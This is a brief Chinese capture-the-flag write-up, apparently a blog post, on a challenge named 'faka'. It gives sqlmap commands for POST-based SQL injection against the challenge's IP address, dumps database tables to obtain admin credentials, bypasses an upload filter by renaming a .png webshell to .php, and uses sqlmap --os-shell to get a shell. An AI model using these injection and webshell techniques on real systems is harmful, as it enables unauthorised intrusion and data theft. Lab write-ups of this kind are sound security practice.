
找到注入的地方,发现购买那就是一个注入点

利用burp suite进行抓包

发现了一个能注入的点,利用post注入即可,先将代码压缩成一个文件然后再用sqlmap跑


接着利用sqlmap跑数据库

sqlmap -r F:\a.txt -D --tables faka
因为题目名字是faka所以跑faka的表

sqlmap -r F:\a.txt -D faka --tables
接着跑表

-r F:\a.txt -D faka -T ayangw_config --columns
再跑字段

(这里发现跑的太慢了,跑不出来。换一种跑的方式)

sqlmap -u "http://117.167.136.244:28087/ajax.php?act=selgo" --data "tyid=1" -D faka -T ayangw_config --dump
扫描网址发现有admin 的路口

利用刚刚的账号密码进入后台

找了很久发现只能从这里上传木马

将木马上传发现没有变化

利用图片找到上传的木马

发现没有变化,尝试着把前面的png改成php

发现上传成功,连接蚁剑即可。

找到flag
flag{ea21bf78-e02c-4cd0-b8a6-54969b708b96}
利用参数–os-shell 或者 --os-cmd 直接连接

sqlmap -u "http://117.167.136.244:28027/ajax.php?act=selgo" --data "tyid=1" --os-shell
发现直接连接了那个网址可以直接找到flag了

找到flag

简陋,勿喷!!!
本文详细介绍了一次SQL注入攻击的具体步骤,包括寻找注入点、利用工具抓包、使用sqlmap跑库及表等,并最终获取到敏感信息。
3588

被折叠的 条评论
为什么被折叠?



